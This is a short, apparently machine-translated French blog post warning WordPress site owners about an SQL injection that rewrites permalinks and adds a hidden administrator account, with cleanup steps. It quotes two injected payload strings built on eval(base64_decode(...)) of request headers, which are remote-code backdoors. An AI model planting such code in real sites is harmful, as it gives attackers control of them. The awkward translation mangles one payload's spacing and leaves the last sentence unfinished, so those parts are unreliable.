WordPress SQL Injection - Dernière attaque

WordPress SQL Injection - Dernière attaque / Nouvelles

De nombreux sites subissent une attaque SQL récente au cours de laquelle des codes sont injectés sur votre site. Cette injection MySQL affecte vos permaliens en les rendant inefficaces. Par conséquent, les URL des articles de votre blog ne fonctionneront pas. De nombreux blogs WordPress ont été ciblés lors de cette attaque, Merci à Andy Soward pour nous avoir signalé cela..

En raison de cette attaque, l'un des codes suivants a été ajouté à votre structure de lien permanent:

% & ($ eval (base64_decode ($ _ SERVER [HTTP_REFERER]) |. +) &%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Ces citations ont ajouté tous les liens permanents sur votre site et ne peuvent être modifiées que si elles sont supprimées manuellement..

Pour résoudre ce problème, allez à:

Paramètres> Permaliens et supprimer le code ci-dessus et remplacer votre code par défaut.

La prochaine chose que vous devez faire est d'aller aux utilisateurs. Vous verrez qu'il y a plus d'un administrateur. Vous ne verrez pas leur nom énuméré, mais vous verrez le nombre augmenter. Vous devez donc examiner tous les utilisateurs et trouver le dernier qui s’est enregistré. Placez votre souris sur cet utilisateur et obtenez le lien. Changez le code userid = en ajoutant 1 à ce nombre. Donc, si le dernier utilisateur que vous pouvez voir était l'utilisateur n ° 2, ajoutez-y 1 et transformez-le en 3. Vous devriez trouver que l'administrateur caché a un code étrange comme prénom. Supprimez le code et faites-en un abonné. Puis revenez et supprimez-le.

Cela devrait résoudre le problème. Vous pouvez également le supprimer en accédant simplement à votre compte PHPMyAdmin. Parce que vous allez voir l'utilisateur là-bas.

Nous voulions simplement publier ces nouvelles dès que possible afin que nos utilisateurs puissent être mis à jour. Assurez-vous de vérifier que votre blog n'est pas infecté. Nous espérons que WordPress sortira bientôt.

Aussi, si vous n'avez pas implémenté certaines de ces mesures pour sécuriser votre espace administrateur WordPress.